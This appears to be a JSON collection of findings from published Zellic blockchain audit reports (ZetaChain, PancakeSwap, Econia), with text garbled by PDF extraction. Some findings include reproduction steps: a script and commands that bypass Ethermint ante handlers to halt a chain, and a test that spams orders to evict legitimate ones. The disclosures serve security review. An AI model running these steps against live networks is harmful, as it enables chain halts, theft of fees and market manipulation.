event.Raw.TxHash.String(), event.Raw.BlockNumber, 90000, common.CoinType_Zeta, \"\") sendHash :) msg.Digest() cctx :) k.CreateNewCCTX(ctx, msg, sendHash, zetacoretypes.CctxStatus_PendingOutbound, &senderChain, receiverChain) EmitZetaWithdrawCreated(ctx, cctx) return k.ProcessCCTX(ctx, cctx, receiverChain) } An issue arises if two or more events are emitted in the same transaction with the same parameters. To demonstrate this, let us assume that two identical ZetaSent events are emitted in the same transaction. If the parameters are the same, then the sendHash that is generated from hashing the MsgSendVoter message will be identical for both the events. When this happens, the CCTX that is created will be the same for both events, and thus the CCTX created for the second ZetaSent event will overwrite the CCTX created for the first ZetaSent event. An example of a scenario in which this might occur is when a user wants to send 10,000 ZETA tokens to their own address on a different chain. One way they might do this is by opting to send 5,000 ZETA in two ZetaSent events. Since all other pa- rameters would be the same, only the second ZetaSent event gets processed (the CCTX overwrites the first one). This causes the user to only receive 5,000 ZETA on the receiving chain, even though they originally sent 10,000 ZETA. Additionally, the ProcessCCTX() function will increment the nonce twice in the above scenario. Ethereum enforces that nonces have to always increase by one after each transaction, so in the event that this issue occurs, all outgoing transactions to the re- ceiving chain will begin to fail, halting the bridge in the process. func (k Keeper) ProcessCCTX(ctx sdk.Context, cctx zetacoretypes.CrossChainTx, receiverChain *common.Chain) error { /) [ ...)) ] err :) k.UpdateNonce(ctx, receiverChain.ChainId, &cctx) if err !) nil { return fmt.Errorf(\"ProcessWithdrawalEvent: update nonce failed: %s\", err.Error()) } Zellic ZetaChain /) [ ...)) ] } func (k Keeper) UpdateNonce(ctx sdk.Context, receiveChainID int64, cctx *types.CrossChainTx) error { chain :) k.zetaObserverKeeper.GetParams(ctx).GetChainFromChainID(receiveChainID) nonce, found :) k.GetChainNonces(ctx, chain.ChainName.String()) if !found { return sdkerrors.Wrap(types.ErrCannotFindReceiverNonce, fmt.Sprintf(\"Chain(%s) | Identifiers : %s \", chain.ChainName.String(), cctx.LogIdentifierForCCTX())) } /) SET nonce cctx.GetCurrentOutTxParam().OutboundTxTssNonce = nonce.Nonce nonce.Nonce+) k.SetChainNonces(ctx, nonce) return nil } We recommend introducing an ever-increasing nonce within the ZetaConnectorZEVM smart contract. Whenever a new event is emitted by the smart contract, this nonce should be incremented. This means that every emitted event is distinct from all other emitted events, and thus each emitted event will cause the creation of a new CCTX, preventing this issue from occurring. This issue has been acknowledged by ZetaChain, and a fix was implemented in com- mit 2fdec9ef. Zellic ZetaChain", + "html_url": "https://github.com/Zellic/publications/blob/master/ZetaChain - 6.30.23 Zellic Audit Report.pdf" + }, + { + "title": "3.7 Missing authentication when adding node keys", + "labels": [ + "Zellic" + ], + "body": "Target: keeper_node_account.go Category: Coding Mistakes Likelihood: High Severity: Critical : Critical The SetNodeKeys message allows a node to supply a public key that will be used for the TSS signing: func (k msgServer) SetNodeKeys(goCtx context.Context, msg *types.MsgSetNodeKeys) (*types.MsgSetNodeKeysResponse, error) { ctx :) sdk.UnwrapSDKContext(goCtx) addr, err :) sdk.AccAddressFromBech32(msg.Creator) if err !) nil { return nil, sdkerrors.Wrap(sdkerrors.ErrInvalidRequest, fmt.Sprintf(\"msg creator %s not valid\", msg.Creator)) } _, found :) k.GetNodeAccount(ctx, msg.Creator) if !found { na :) types.NodeAccount{ Creator: msg.Creator, Index: msg.Creator, NodeAddress: addr, PubkeySet: msg.PubkeySet, NodeStatus: types.NodeStatus_Unknown, } k.SetNodeAccount(ctx, na) } else { return nil, sdkerrors.Wrap(sdkerrors.ErrInvalidRequest, fmt.Sprintf(\"msg creator %s already has a node account\", msg.Creator)) } return &types.MsgSetNodeKeysResponse{}, nil } The issue is that there are no authentication or verification checks in place to limit who can call it. As a result, anyone can call the function and add their public key to the list. Zellic ZetaChain The list of node accounts is fetched in the InitializeGenesisKeygen and in the zeta client\u2019s genNewKeysAtBlock in order to determine the public keys that should be used for the TSS signing. If anyone is able to add their public key before the list is queried (for example, just before the block number that the new keys will be generated), they could potentially be able to control enough signatures to pass the threshold and sign transactions or otherwise create a denial of service where the TSS can no longer sign anything. Adding node accounts should be a privileged operation, and only trusted keys should be able to be added. This issue has been acknowledged by ZetaChain, and a fix was implemented in com- mit a246e64b. Zellic ZetaChain", + "html_url": "https://github.com/Zellic/publications/blob/master/ZetaChain - 6.30.23 Zellic Audit Report.pdf" + }, + { + "title": "3.8 Missing nil check when parsing client event", + "labels": [ + "Zellic" + ], + "body": "Target: evm_client.go Category: Coding Mistakes Likelihood: High Severity: High : High One of the responsibilities of the zeta client is to watch for incoming transactions and handle any ZetaSent events emitted by the connector. logs, err :) ob.Connector.FilterZetaSent(&bind.FilterOpts{ Start: uint64(startBlock), End: &tb, Context: context.TODO(), }, []ethcommon.Address{}, []*big.Int{}) if err !) nil { return err } cnt, err :) ob.GetPromCounter(\"rpc_getLogs_count\") if err !) nil { return err } cnt.Inc() /) Pull out arguments from logs for logs.Next() { event :) logs.Event ob.logger.Info().Msgf(\"TxBlockNumber %d Transaction Hash: %s Message : %s\", event.Raw.BlockNumber, event.Raw.TxHash, event.Message) destChain :) common.GetChainFromChainID(event.DestinationChainId.Int64()) destAddr :) clienttypes.BytesToEthHex(event.DestinationAddress) if strings.EqualFold(destAddr, con- fig.ChainConfigs[destChain.ChainName.String()].ZETATokenContractAddress) { ob.logger.Warn().Msgf(\"potential attack attempt: %s destination address is ZETA token contract address %s\", destChain, destAddr)} Zellic ZetaChain When fetching the destination chain, common.GetChainFromChainID(event.Destinatio nChainId.Int64()) is used, which will return nil if the chain is not found. func GetChainFromChainID(chainID int64) *Chain { chains :) DefaultChainsList() for _, chain :) range chains { if chainID =) chain.ChainId { return chain } } return nil } Since a user is able to specify any value for the destination chain, if a nonsupported chain is used, then destChain will be nil and the following destChain.ChainName call will cause the client to crash. As all the clients watching the remote chain will see the same events, a malicious user (or a simple mistake entering the chain) will cause all the clients to crash. If the clients automatically restart and try to pick up from the block they were up to (the default), then they will crash again and enter into an endless restart and crash loop. This will prevent any incoming or outgoing transactions on the remote chain from being processed, effectively halting that chain\u2019s integration. There should be an explicit check to ensure that destChain is not nil and to skip the log if it is. It would also be a good idea to have a recovery mechanism that can handle any blocks that cause the client to crash and skip them. This will help prevent the remote chain from being paused if a similar bug occurs again. This issue has been acknowledged by ZetaChain, and a fix was implemented in com- mit 0dfbf8d7. Zellic ZetaChain", + "html_url": "https://github.com/Zellic/publications/blob/master/ZetaChain - 6.30.23 Zellic Audit Report.pdf" + }, + { + "title": "3.9 Case-sensitive address check allows for double signing", + "labels": [ + "Zellic" + ], + "body": "Target: keeper_chain_nonces.go Category: Coding Mistakes Likelihood: Low Severity: High : High The IsDuplicateSigner() function is used to check whether a given address already exists within a list of signers. It does this by doing a string comparison, which is case sensitive. func isDuplicateSigner(creator string, signers []string) bool { for _, v :) range signers { if creator =) v { return true } } return false } This function is used in CreateTSSVoter(), which is the message handler for the MsgCr eateTSSVoter message. This message is used by validators to vote on a new TSS. func (k msgServer) CreateTSSVoter(goCtx context.Context, msg *types.MsgCreateTSSVoter) (*types.MsgCreateTSSVoterResponse, error) { /) [ ...)) ] if isDuplicateSigner(msg.Creator, tssVoter.Signers) { return nil, sdkerrors.Wrap(sdkerrors.ErrorInvalidSigner, fmt.Sprintf(\"signer %s double signing!)\", msg.Creator)) } /) [ ...)) ] /) this needs full consensus on all validators. if len(tssVoter.Signers) =) len(validators) { tss :) types.TSS{ Creator: \"\", Index: tssVoter.Chain, Zellic ZetaChain Chain: tssVoter.Chain, Address: tssVoter.Address, Pubkey: tssVoter.Pubkey, Signer: tssVoter.Signers, FinalizedZetaHeight: uint64(ctx.BlockHeader().Height), } k.SetTSS(ctx, tss) } return &types.MsgCreateTSSVoterResponse{}, nil } In Cosmos-based chains, addresses are alphanumeric, and the alphabetical charac- ters in the address can either be all uppercase or all lowercase when represented as a string. This means that case-sensitive string comparisons, such as the one in IsDup licateSigner(), can allow a single creator to pass the check twice \u2014 once for an all lowercase address, and once for an all uppercase version of the same address. Due to the len(tssVoter.Signers) =) len(validators) check, it is possible for a ma- licious actor to spin up multiple bonded validators and double sign with each of them. This would cause the check to erroneously pass, even though full consensus has not been reached, and allow the malicious actor to effectively force the vote to pass. The sdk.AccAddressFromBech32() function can be used to convert a string address to an instance of a sdk.AccAddress type. Comparing two sdk.AccAddress types is the correct way to compare addresses in Cosmos-based chains, and it will fix this issue. This issue has been acknowledged by ZetaChain, and a fix was implemented in com- mit 83d0106b. Zellic ZetaChain", + "html_url": "https://github.com/Zellic/publications/blob/master/ZetaChain - 6.30.23 Zellic Audit Report.pdf" + }, + { + "title": "3.10 No panic handler in Zetaclient may halt cross-chain com- munication", + "labels": [ + "Zellic" + ], + "body": "Target: btc_signer.go Category: Coding Mistakes Likelihood: Medium Severity: High : High The code under zetaclient/ implements two separate clients \u2014 an EVM client for all EVM-compatible chains and a Bitcoin client for the Bitcoin chain. The clients are intended to relay transactions between chains as well as watch for cross-chain inter- actions (via emitted events). In the event that a panic occurs in the zetaclient code, the client will simply crash. If a malicious actor is able to find a reliable way to cause panics, they can effectively halt all cross-chain communications by crashing all of the clients for that specific chain. We discovered a bug in the Bitcoin client that can allow a malicious actor to achieve this; however, there may be numerous other ways to do this. The bug exists in the Bitcoin client\u2019s TryProcessOutTx() function. func (signer *BTCSigner) TryProcessOutTx(send *types.CrossChainTx, outTxMan *OutTxProcessorManager, outTxID string, chainclient ChainClient, zetaBridge *ZetaCoreBridge) { /) [ ...)) ] /) FIXME: config chain params addr, err :) btcutil.DecodeAddress(string(toAddr), config.BitconNetParams) if err !) nil { logger.Error().Err(err).Msgf(\"cannot decode address %s \", send.GetCurrentOutTxParam().Receiver) return } /) [ ...)) ] } Zellic ZetaChain Specifically, the call to btcutil.DecodeAddress() can panic if the toAddr provided to it is not a valid Bitcoin address. This is easily achieved by passing in an EVM-compatible address instead. The following stack trace is observed when the crash occurs: zetaclient0 | panic: runtime error: index out of range [65533] with length zetaclient0 | zetaclient0 | goroutine 12508 [running]: zetaclient0 | github.com/btcsuite/btcutil/base58.Decode({0xc005e9f968, 0x14}) zetaclient0 | ^^I/go/pkg/mod/github.com/btcsuite/btcutil@v1.0.3- 0.20201208143702-a53e38424cce/base58/base58.go:58 +0x305 zetaclient0 | github.com/btcsuite/btcutil/base58.CheckDecode({0xc005e9f968?, 0xc001300000?}) zetaclient0 | ^^I/go/pkg/mod/github.com/btcsuite/btcutil@v1.0.3- 0.20201208143702-a53e38424cce/base58/base58check.go:39 +0x25 zetaclient0 | github.com/btcsuite/btcutil.DecodeAddress({0xc005e9f968?, 0xc0061a6de0?}, 0x458b080) zetaclient0 | ^^I/go/pkg/mod/github.com/btcsuite/btcutil@v1.0.3- 0.20201208143702-a53e38424cce/address.go:182 +0x2aa zetaclient0 | github.com/zeta- chain/zetacore/zetaclient.(*BTCSigner).TryProcessOutTx(0xc004aed680, 0xc006691680, 0xc00053aab0, {0xc00484edc0, 0x4a}, {0x32c9040?, 0xc0050ba200}, 0xc000e9af00) zetaclient0 | ^^I/go/delivery/zeta-node/zetaclient/btc_signer.go:213 +0x893 zetaclient0 | created by github.com/zeta- chain/zetacore/zetaclient.(*CoreObserver).startSendScheduler zetaclient0 | ^^I/go/delivery/zeta- node/zetaclient/zetacore_observer.go:224 +0x1045 The bug demonstrated above is in an external package that is not maintained by the ZetaChain team. Since it is not sustainable to go through and fix any such bugs that arise from the use of external packages, we recommend adding a panic handler to the Zetaclient code so that panics are handled gracefully and preferably logged, so they can be taken care of later. Zellic ZetaChain This issue has been acknowledged by ZetaChain, and a fix was implemented in com- mit f2adb252. Zellic ZetaChain", + "html_url": "https://github.com/Zellic/publications/blob/master/ZetaChain - 6.30.23 Zellic Audit Report.pdf" + }, + { + "title": "3.11 Ethermint Ante handler bypass", + "labels": [ + "Zellic" + ], + "body": "Target: app/ante/handler_options.go Category: Coding Mistakes Likelihood: High Severity: High : High It is possible to bypass the EthAnteHandler by wrapping the ethermint.evm.v1.MsgEthe reumTx inside a MsgExec as described in https://jumpcrypto.com/bypassing-ethermint- ante-handlers/. These are responsible for numerous vital actions such as deducting the gas limit from the sender\u2019s account to limit the number computations a contract can perform. It is possible to cause a complete chain halt by deploying a contract with an infinite loop and then calling it with a huge gas limit. Since the coins are not deducted from the senders account, the gas limit will be accepted and the EVM will get stuck in the loop. The following steps can be performed to replicate this issue. First, create a new ac- count to simulate a malicious user, then deploy the following contract to the zEVM: /) SPDX-License-Identifier: MIT pragma solidity ^0.8.7; contract Demo { function loop() external { while(true) {} } } Using the details of the malicious account (one can use zetacored keys unsafe-expo rt-eth-key to get the private key) and the deployed contract, sign a transaction and get the hex bytes: import web3 from web3 import Web3 account = \"0x30b254F67cBaB5E6b12b92329b53920DE403aA02\" contract = \"0x6da71267cd63Ec204312b7eD22E02e4E656E72ac\" Zellic ZetaChain private_key = \"xxx\" loop_selector = \"0xa92100cb\" loop_data={\"data\":loop_selector,\"from\": account, \"gas\": \"0xFFFFFFFFFFFFFFF\",\"gasPrice\": \"0x7\",\"to\": contract,\"value\": \"0x0\", \"nonce\": \"0x0\"} w3 = web3.Web3(web3.HTTPProvider(\"http:))localhost:9545\")) print(w3.eth.account.sign_transaction(transaction_dict=nop_data, private_key=private_key)) This can then be used to generate a MsgEthereumTx message, which we then remove the ExtensionOptionsEthereumTx and wrap it in a MsgExec using the authz grant mech- anism: zetacored tx evm raw [TX_HASH] -)generate-only > /tmp/tx.json sed -i 's/{\"@type\":\"\\/ethermint.evm.v1.ExtensionOptionsEthereumTx\"}/)g' /tmp/tx.json zetacored tx -)chain-id athens_101-1 -)keyring-backend=test -)from $hacker authz exec /tmp/tx.json -)fees 20azeta -)yes Since the granter and the grantee are the same in this instance, the grant automatically passes, causing the inner message to be executed and putting the nodes in an infinite loop. It is also possible to steal all the transaction fees for the current block by supplying a higher gas limit that is used. Since the gas was never paid for, when RefundGas is triggered, it will end up sending any gas that was collected from other transactions. Consider adding a new Ante handler base on the AuthzLimiterDecorator that was used to fix the issue in EVMOS; see https://github.com/evmos/evmos/blob/v12.1.2/app/ante/cosmos/authz.go#L58- L91. This issue has been acknowledged by ZetaChain, and a fix was implemented in com- mit 3362b137. Zellic ZetaChain", + "html_url": "https://github.com/Zellic/publications/blob/master/ZetaChain - 6.30.23 Zellic Audit Report.pdf" + }, + { + "title": "3.12 Unbonded validators prevent the TSS vote from passing", + "labels": [ + "Zellic" + ], + "body": "Target: keeper_tss_voter.go Category: Coding Mistakes Likelihood: High Severity: Medium : Medium Bonded validators can cast a vote to add a new TSS by sending a MsgCreateTSSVoter. The issue is that there is a check to allow only bonded validators to vote, but for the vote to pass, the number of signers must be equal to the total number of validators (which includes unbonded/unbonding validators). func (k msgServer) CreateTSSVoter(goCtx context.Context, msg *types.MsgCreateTSSVoter) (*types.MsgCreateTSSVoterResponse, error) { ctx :) sdk.UnwrapSDKContext(goCtx) validators :) k.StakingKeeper.GetAllValidators(ctx) if !IsBondedValidator(msg.Creator, validators) { return nil, sdkerrors.Wrap(sdkerrors.ErrorInvalidSigner, fmt.Sprintf(\"signer %s is not a bonded validator\", msg.Creator)) } /) [ ...)) ] /) this needs full consensus on all validators. if len(tssVoter.Signers) =) len(validators) { tss :) types.TSS{ Creator: \"\", Index: tssVoter.Chain, Chain: tssVoter.Chain, Address: tssVoter.Address, Pubkey: tssVoter.Pubkey, Signer: tssVoter.Signers, FinalizedZetaHeight: uint64(ctx.BlockHeader().Height), } k.SetTSS(ctx, tss) } return &types.MsgCreateTSSVoterResponse{}, nil } Zellic ZetaChain If not every validator is a bonded validator, then it is impossible to add a new TSS as the vote can never pass. As anyone can become an unbonded validator, this would be easy to trigger and will likely happen in the course of normal operation as validators will unbond, putting them into an unbonding state. It is also possible for a bonded validator to sign the vote, become unbonded and re- moved, and have the vote still count. The vote should only be passed when the set of currently bonded validators have all signed it. This issue has been acknowledged by ZetaChain. Zellic ZetaChain", + "html_url": "https://github.com/Zellic/publications/blob/master/ZetaChain - 6.30.23 Zellic Audit Report.pdf" + }, + { + "title": "3.1 Precision factor is not precise enough", + "labels": [ + "Zellic" + ], + "body": "Target: pancake::smart_chef Category: Coding Mistakes Likelihood: High Severity: High : High The precision_factor used to avoid division precision errors is not large enough to mitigate truncation to zero errors. The formula for acc_token_per_share is calculated by acc_token_per_share = acc_token_per_share + (reward * precision_factor) / total_stake; and the precision_factor is calculated by let precision_factor = math:)pow(10, (16 - reward_token_decimal)); In the case that total_stake is greater than (reward * precision_factor), which can happen if the average user deposits 100 StakeToken coins of 12 decimals, or one factor smaller of a token of one decimal lower, acc_token_per_share can get truncated to zero via the division. This disables users from getting rewards, with the threat being highly likely for any coin greater than 11 decimals. In a proof of concept, we recreated such a scenario by first minting some users an av- erage of 100 coins of a token of 12 decimals via a pseudo-random number generator and staking them. while (i < 30) { let minted_amount = *vector:)borrow_mut(&mut random_num_vec, i) * pow(10, coin_decimal_scaling); test_coins:)register_and_mint(&coin_owner, vector:)borrow(&signers_vec, i), minted_amount); Zellic PancakeSwap i = i + 1; }; while (i < 30) { deposit(vector:)borrow(&signers_vec, i), coin:)balance(signer:)address_of(vector:)borrow(&signers_vec, i)))); i = i + 1; }; We then increased the timestamp to allow rewards to accrue via the following: timestamp:)update_global_time_for_test_secs(start_time + 30); And finally, we retrieved the reward for each staker through the following code, while (i < 30) { let user_pending_reward = get_pending_reward(signer:)address_of(vector:)borrow(&signers_vec, i))); debug:)print(&user_pending_reward); i = i + 1; }; in which all user_pending_reward outputted a zero value, which indicated no users received any rewards. We provided a full test for PancakeSwap Finance for reproduction. We recommend using a higher precision factor such as in the EVM version or restrict- ing the maximum decimal of the reward and stake coin to no greater than 10. PancakeSwap acknowledged the finding and resolved it in commits 19a751d7 and 390c8744. Zellic PancakeSwap", + "html_url": "https://github.com/Zellic/publications/blob/master/PancakeSwap Aptos - Zellic Audit Report.pdf" + }, + { + "title": "3.2 Excessive rewards allocation leads to DOS", + "labels": [ + "Zellic" + ], + "body": "Target: pancake::smart_chef Category: Coding Mistakes Likelihood: Low Severity: Medium : High First, understand the following variables in the add_reward function: pool_info.historical_add_reward: the total amount of reward LP that the admin has deposited. pool_info.reward_per_second: the maximum amount of reward LP the admin is allowed to deposit per second; the following assertion in add_reward requires that the admin\u2019s new deposit does not cause the historical average reward LP deposit per second to exceed pool_info.reward_per_second: pool_info.historical_add_reward = pool_info.historical_add_reward + amount; assert!(pool_info.reward_per_second * (pool_info.end_timestamp - pool_info.start_timestamp) >) pool_info.historical_add_reward, ERROR_REWARD_MAX); When calculating pool_info.acc_token_per_share using the cal_acc_token_per_shar e function, we see that the reward-to-stake token ratio is based off of reward_per_s econd, which is the maximum reward LP deposit rate\u2014not the actual deposit rate\u2014 multiplied by the period multiplier: let reward = u256:)from_u128((reward_per_second as u128) * (multiplier as u128)); Because the ratio is calculated using the maximum reward and the admin can deposit less than this amount, reward payouts may be too large, meaning the protocol can potentially be in deficit, leading to an underflow abort given enough withdrawals. This would require users to emergency_withdraw and forfeit rewards to save their funds. The reward supply can be lower than it should be; the aforementioned add_reward assertion requires that the \u201climit >= actual\u201d, meaning the \u201cactual supply is always <= the limit\u201d. For the reward supply to be sufficient, it must always be equal to the limit. We created tests to prove the existence of this bug and provided them to the customer separately from this report. Zellic PancakeSwap Certain conditions may lead to users having to save funds by calling emergency_withd raw, forfeiting their rewards. The following scenarios increase the likelihood of triggering the bug: smaller amounts deposited by an admin, at least less than the reward LP deposit limit (pool_info.reward_per_second). more users depositing at the pool start, fewer users depositing after pool start (pool_info.start_timestamp). more users withdrawing rewards later in the pool period. Rather than using the reward token LP deposit limit when calculating pool_info.acc_ token_per_share, use the actual reward token LP balance. Note that admins may deposit reward token LP after the pool has started. PancakeSwap remediated the issue by taking out pool_info.historical_add_reward in commit 19a751d7. Zellic PancakeSwap", + "html_url": "https://github.com/Zellic/publications/blob/master/PancakeSwap Aptos - Zellic Audit Report.pdf" + }, + { + "title": "3.3 Potential overflow in the add_reward function", + "labels": [ + "Zellic" + ], + "body": "Target: pancake::smart_chef Category: Coding Mistakes Likelihood: Low Severity: Low : High In the add_reward function, there exists the following assertion that checks that the admin is not depositing more reward LP than the pool.historical_add_reward limit: assert!(pool_info.reward_per_second * (pool_info.end_timestamp - pool_info.start_timestamp) >) pool_info.historical_add_reward, ERROR_REWARD_MAX); Note that multiplying these two u64 values may result in an integer overflow\u2014especially since pool_info.reward_per_second will likely be a large number, particularly for re- ward tokens of larger decimals, and the maximum u64 value is only 20 decimals. It is possible for an admin to configure a pool in a way that admins cannot deposit reward LP using the add_reward function. Cast the multiplier and multiplicand values to u256 before the operation: assert!(pool_info.reward_per_second * (pool_info.end_timestamp - pool_info.start_timestamp) >) pool_info.historical_add_reward, ERROR_REWARD_MAX); assert!(u256:)as_u128(u256:)mul( u256:)from_u64(pool_info.reward_per_second), u256:)sub( u256:)from_u64(pool_info.end_timestamp), u256:)from_u64(pool_info.start_timestamp) ) )) >) pool_info.historical_add_reward as u128, ERROR_REWARD_MAX); Zellic PancakeSwap PancakeSwap remediated the issue by taking out pool_info.historical_add_reward in commit 19a751d7. Zellic PancakeSwap", + "html_url": "https://github.com/Zellic/publications/blob/master/PancakeSwap Aptos - Zellic Audit Report.pdf" + }, + { + "title": "3.1 Adversarial order eviction", + "labels": [ + "Zellic" + ], + "body": "Target: econia:)avl_queue Category: Business Logic Likelihood: High Severity: Critical : Critical Econia\u2019s order book is built on an AVL queue. To avoid allowing the data structure to grow too large (incurring excessive gas costs for insertions and deletions), Econia evicts the order with the lowest price-time priority if the AVL queue tree exceeds a critical height. Critical height checking and eviction occur when inserting a new node using the ins ert_check_eviction or insert_evict_tail functions. When placing an order, Econia uses the insert_check_eviction function to update the AVL queue, then cancels any evicted orders: /) Get new AVL queue access key, evictee access key, and evictee /) value by attempting to insert for given critical height. let (avlq_access_key, evictee_access_key, evictee_value) = avl_queue:)insert_check_eviction( orders_ref_mut, price, order, critical_height); /) [...))] if (evictee_access_key =) NIL) { /) If no eviction required: /) Destroy empty evictee value option. option:)destroy_none(evictee_value); } else { /) If had to evict order at AVL queue tail: /) Unpack evicted order, storing fields for event. let Order{size, price, user, custodian_id, order_access_key} = option:)destroy_some(evictee_value); /) Get price of cancelled order. let price_cancel = evictee_access_key & HI_PRICE; /) Cancel order user-side, storing its market order ID. let market_order_id_cancel = user:)cancel_order_internal( user, market_id, custodian_id, side, price_cancel, order_access_key, (NIL as u128)); Zellic Econia Labs /) Emit a maker evict event. event:)emit_event(&mut order_book_ref_mut.maker_events, MakerEvent{ market_id, side, market_order_id: market_order_id_cancel, user, custodian_id, type: EVICT, size, price}); }; The protocol does not take a fee when a user places an order, and orders can be cancelled within the same transaction. An attacker can cause legitimate orders to be evicted from the structure, effectively cancelling them. Aptos maximum gas limit allows an attacker to perform the attack in one single transaction, without any risk for the attacker\u2019s assets (temporarily required to be deposited to Econia to place the malicious orders). Aside from the DOS threat for any protocol built on Econia, the vulnerability can have further impacts depending on the protocol. Consider the following examples of pro- tocol types and how they may be impacted by this vulnerability: Decentralized token exchanges: Attackers can use this vulnerability to manipu- late the order book to evict all orders on one side of the book. They could then place orders at arbitrary prices, allowing them to profit from buying or selling assets at an artificial price that does not reflect the market value from unsus- pecting users and bots. This would also impact the trading strategies of users who might not expect their orders to be cancelled. Decentralized margin trading protocols: Attackers can exploit this vulnerability to influence the price of one or more assets, causing margin positions to be liquidated. This scenario is plausible if the margin trading protocol infers asset pricing from order book entries (e.g., using BID or ASK price or mid-market rate) or by looking at the price of recent trade events. Decentralized derivatives markets: Attackers can place orders with a higher price-time priority than what the derivatives traders have set, allowing them to take advantage of the traders\u2019 positions and force them to liquidate at a loss. This can happen if the derivatives market uses the mid-market rate on Econia as the price source, or alternatively, the last trades. This gives the attacker access to the funds that the derivatives trader has deposited in the protocol. Decentralized lending protocols: Attackers can use this vulnerability to manipu- late the order book, allowing them to borrow funds for a lower interest rate than what is actually available on the market. This can happen if the lending protocol uses the mid-market rate on Econia as the price source, or alternatively, the last Zellic Econia Labs trades. This gives them an unfair advantage over legitimate borrowers, allow- ing them to borrow funds at a much lower rate and thus allowing them to steal funds from the protocol. Reproduction steps To perform an attack, an attacker may use the following steps: 1. Place enough limit orders with a higher price-time priority than the target trans- action(s) on the same side (BID/ASK), storing each resulting order ID. The order size must be valid, but it can be any amount. Each order price must be unique; a new price level must exist for each order. The price must not cross the spread, since the order has to be posted on the book. The maximum number of orders required to evict any other order is 2,048 given the critical tree height CRITICAL_HEIGHT of 10 at the time of the audit and given that every illegitimate order has a unique price level. Fewer orders may be re- quired when the order book contains legitimate orders at different price levels with a higher price-time priority than the target order. Note that this attack may be funded by a flash loan if the attacker does not have sufficient funds to place the malicious orders. Though a flash loan may take a fee, the profit of an attack using this vulnerability will likely exceed any flash loan fee. 2. Cancel all stored order IDs of illegitimate orders. The attacker\u2019s funds will be returned without any fee being charged. Limit orders evicted in step 1 remain cancelled. We note that the worst case scenario from an attacker\u2019s perspective is evicting all orders from one side of a very liquid market, where the spread is likely negligible and there\u2019s a high concentration of assets near it. It might not be possible to post 2,048 orders at different price levels without crossing the spread in order to evict all orders from one side. This does not prevent the attack, but it will require widening the spread by filling orders on one or both sides of the book, costing some capital. The majority of the capital can likely be recovered, as the orders filled by the attacker are priced near the \u201ccorrect\u201d market rate of the asset. Demonstrative test To demonstrate an attack, we provided the following proof of concept to Econia Labs: Zellic Econia Labs #)test(account = @simulation_account)] fun test_can_cancel_legitimate_order(account: &signer) acquires OrderBooks, Orders { /) initialize markets, users, and an integrator. let (user_0, user_1) = init_markets_users_integrator_test(); let user_2 = account:)create_account_for_test(@user_2); user:)register_market_account( &user_2, MARKET_ID_COIN, NO_CUSTODIAN); /) setup test let (taker_divisor, integrator_divisor) = (incentives:)get_taker_fee_divisor(), incentives:)get_fee_share_divisor(INTEGRATOR_TIER)); let price = integrator_divisor * taker_divisor; let initial_amount_bc = HI_64/2; let initial_amount_qc = HI_64/2; user:)deposit_coins(@user_0, MARKET_ID_COIN, NO_CUSTODIAN, assets:)mint_test(initial_amount_bc)); user:)deposit_coins(@user_0, MARKET_ID_COIN, NO_CUSTODIAN, assets:)mint_test(initial_amount_qc)); user:)deposit_coins(@user_1, MARKET_ID_COIN, NO_CUSTODIAN, assets:)mint_test(initial_amount_bc)); user:)deposit_coins(@user_1, MARKET_ID_COIN, NO_CUSTODIAN, assets:)mint_test(initial_amount_qc)); user:)deposit_coins(@user_2, MARKET_ID_COIN, NO_CUSTODIAN, user:)deposit_coins(@user_2, MARKET_ID_COIN, NO_CUSTODIAN, assets:)mint_test(initial_amount_qc)); assets:)mint_test(initial_amount_bc)); /) #1: place limit order ASK size*4 debug:)print(&1); let (order_id, _, _, _) = place_limit_order_user( &user_0, MARKET_ID_COIN, @integrator, ASK, MIN_SIZE_COIN*4, price, POST_OR_ABORT); debug:)print(&std:)bcs:)to_bytes(&order_id)); /) #2: place limit order BID size (fulfills immediately) debug:)print(&2); Zellic Econia Labs let (order_id, base_traded, quote_traded, fees) = place_limit_order_user( &user_1, MARKET_ID_COIN, @integrator, BID, MIN_SIZE_COIN*1, price, FILL_OR_ABORT); debug:)print(&std:)bcs:)to_bytes(&order_id)); debug:)print(&base_traded); debug:)print("e_traded); debug:)print(&fees); /) #3: spam orders debug:)print(&3); let n_orders = 2048; let i: u64 = 0; let ids: vector = vector:)empty(); while (i < n_orders) { let (order_id, _, _, _) = place_limit_order_user( &user_1, MARKET_ID_COIN, @integrator, ASK, MIN_SIZE_COIN, price-i-1, POST_OR_ABORT); debug:)print(&std:)bcs:)to_bytes(&order_id)); vector:)push_back(&mut ids, order_id); i = i + 1; }; i = 0; while (i < n_orders) { let order_id = vector:)pop_back(&mut ids); cancel_order_user(&user_1, MARKET_ID_COIN, ASK, order_id); i = i + 1; }; /) #4: place market order BUY debug:)print(&4); let (base_traded, quote_traded, fees) = place_market_order_user( &user_2, MARKET_ID_COIN, @integrator, BUY, 0, MAX_POSSIBLE, 0, MAX_POSSIBLE, price*200); debug:)print(&base_traded); /) should be 0 if #1 was cancelled debug:)print("e_traded); /) should be 0 ^ Zellic Econia Labs debug:)print(&fees); /) should be 0 ^ /) #5: verify there are no ASK orders left since #1 was evicted index_orders_sdk(account, MARKET_ID_COIN); /) Index orders. let orders = borrow_global(@simulation_account); assert!(vector:)length(&orders.asks) =) 0, 0); } The test places a legitimate order, then places 2048 illegitimate orders, cancels all illegitimate orders, then verifies that the legitimate order was also cancelled. There are a few potential approaches to lower the risk of attack, though none of the following strategies is a complete solution. Impose a minimum order size and tick size This would help deter adversarial behavior by requiring more capital to perform the attack. This approach has the advantage of being relatively straightforward to imple- ment. The approach does not eliminate the vulnerability for a well-funded attacker (possibly financed via a flash loan); the profits may easily exceed the cost, especially since the attacker recovers their funds when cancelling their order. Disallowing immediate cancellation of orders This would require storing a sequence number in each user\u2019s order, and it could be imposed either for the current block number (one-block delay required to cancel) or by an account sequence number (a minimum of one transaction delay required to cancel). This strategy has the advantage of making the attack riskier and more costly, as the attacker would now have to wait before being able to cancel the orders and recover their funds; during the delay period, bots may fulfill the high price-level orders. Though, this approach does not eliminate the attack vector because an attacker can still exploit the vulnerability over multiple transactions. Additionally, this strategy may be problematic for market makers, as it would prevent them from quickly cancelling orders. Zellic Econia Labs Increase the critical height for eviction This would make it so that clearing out the order book would take more than 16k dele- tions from the AVL queue, which cannot be done in a single transaction given the cur- rent maximum per-transaction gas limit on Aptos. This strategy has the advantage of being relatively straightforward to implement and could potentially deter a malicious actor. However, it may lead to higher gas costs because Econia must traverse a tree with potentially more price levels. Increasing the maximum size of the order book may also introduce a DOS attack vector where an attacker places many small orders to cause the AVL queue to grow to the point where it is not practical to place orders because of gas fees (or where it is 